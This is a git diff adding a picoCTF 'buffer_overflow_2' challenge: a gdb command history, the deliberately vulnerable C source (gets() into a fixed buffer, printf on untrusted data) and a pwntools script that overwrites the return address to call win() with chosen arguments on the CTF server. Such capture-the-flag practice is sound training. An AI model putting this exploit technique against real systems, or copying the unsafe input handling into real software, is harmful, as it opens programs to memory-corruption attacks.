diff --git a/buffer_overflow_2/.gdb_history b/buffer_overflow_2/.gdb_history new file mode 100644 index 0000000..918d673 --- /dev/null +++ b/buffer_overflow_2/.gdb_history @@ -0,0 +1,176 @@ +r +exit +exit +disassemble vuln +b *vuln+44 +c +c +exit +b *vuln+44 +c +stackf +disassemble vuln +b *vuln+29 +exit +b *vuln+29 +c +b *vuln+29 +continue +disassemble vuln +b *vuln+44 +c +stackf +hexdump +hexdump +hexdump help +hexdump $sp 20 +hexdump $sp 20 +hexdump $sp 100 +hexdump $sp 120 +hexdump $sp 140 +hexdump $sp 160 +c +c +b *vuln+44 +c +stackf +disassemble win +b *win +c +stackf +disassemble win +b *win+11 +c +stackf +c +b *win+11 +c +c +exit +b *win+11 +c +stackf +nexti +exit +disassemble vuln +b *vuln+75 +c +disassemble vuln +b *vuln+57 +c +nexti +stackf +disassemble vuln +disassemble win +hexdump $ebp+0x08 +stackf +c +disassemble win +b *win+118 +c +c +exit +b *win+118 +c +b *vuln+57 +c +stackf +nexti +stackf +disassemble win +b *win+16 +c +stackf +disassemble win +stackf +hexdump $sp 100 +hexdump $sp 200 +c +c +b *win+16 +c +hexdump $sp 200 +stackf +c +c +c +exit +c +stackf +disassemble win +b *win+7 +exit +b *win+7 +c +stackf +hexdump $sp 200 +c +exit +b *win+7 +c +stackf +hexdump $sp 200 +disassemble *main +exit +b *win+7 +c +stackf +hexdump $sp 200 +disassemble *win +nexti +disassemble *win +nexti +disassemble *win +nexti +disassemble *win +hexdump $sp 200 +nexti +hexdump $sp 200 +c +c +exit +disassemble *win +b *win+118 +c +stackf +hexdump $sp 200 +disassemble *win +b *win+118 +c +hexdump $sp 200 +disassemble *win +hexdump $ebp +b *win+118 +c +disassemble *win +stackf +c +c +exit +b *win+118 +c +stackf +disassemble win +hexdump $ebp +hexdump $ebp+8 +nexti +nexti +stackf +b *win+118 +c +nexti +nexti +hexdump $ebp +hexdump $ebp+8 +hexdump $ebp+12 +c +b *win+118 +c +stackf +disassemble win +b *win+143 +c +disassemble win +nexti +c +exit diff --git a/buffer_overflow_2/flag.txt b/buffer_overflow_2/flag.txt new file mode 100644 index 0000000..f90365f --- /dev/null +++ b/buffer_overflow_2/flag.txt @@ -0,0 +1 @@ +{test} diff --git a/buffer_overflow_2/sol.py b/buffer_overflow_2/sol.py new file mode 100755 index 0000000..0a9a557 --- /dev/null +++ b/buffer_overflow_2/sol.py @@ -0,0 +1,24 @@ +#!/usr/bin/env python +from pwn import * +context.terminal = "kitty" + +win_address = 0x08049296 + +buffer_base = 0xfffe422c +ret_location = 0xfffe429c +ret_offset = ret_location - buffer_base + +ebp_offset = 112 +arg1 = 0xCAFEF00D +arg2 = 0xF00DF00D + +conn = remote("saturn.picoctf.net", 56706) +#conn = process("./vuln") +#attach(conn) + +conn.recvline() +conn.writeline(flat({ebp_offset+0x8:arg1, ebp_offset+0xc:arg2, ret_offset:win_address}, word_size=32)) +conn.recvline() +rest = conn.recvuntil(b'}') +log.info(f"got {rest}") + diff --git a/buffer_overflow_2/vuln b/buffer_overflow_2/vuln new file mode 100755 index 0000000..accb967 Binary files /dev/null and b/buffer_overflow_2/vuln differ diff --git a/buffer_overflow_2/vuln.c b/buffer_overflow_2/vuln.c new file mode 100644 index 0000000..3771956 --- /dev/null +++ b/buffer_overflow_2/vuln.c @@ -0,0 +1,44 @@ +#include +#include +#include +#include +#include + +#define BUFSIZE 100 +#define FLAGSIZE 64 + +void win(unsigned int arg1, unsigned int arg2) { + char buf[FLAGSIZE]; + FILE *f = fopen("flag.txt","r"); + if (f == NULL) { + printf("%s %s", "Please create 'flag.txt' in this directory with your", + "own debugging flag.\n"); + exit(0); + } + + fgets(buf,FLAGSIZE,f); + if (arg1 != 0xCAFEF00D) + return; + if (arg2 != 0xF00DF00D) + return; + printf(buf); +} + +void vuln(){ + char buf[BUFSIZE]; + gets(buf); + puts(buf); +} + +int main(int argc, char **argv){ + + setvbuf(stdout, NULL, _IONBF, 0); + + gid_t gid = getegid(); + setresgid(gid, gid, gid); + + puts("Please enter your string: "); + vuln(); + return 0; +} +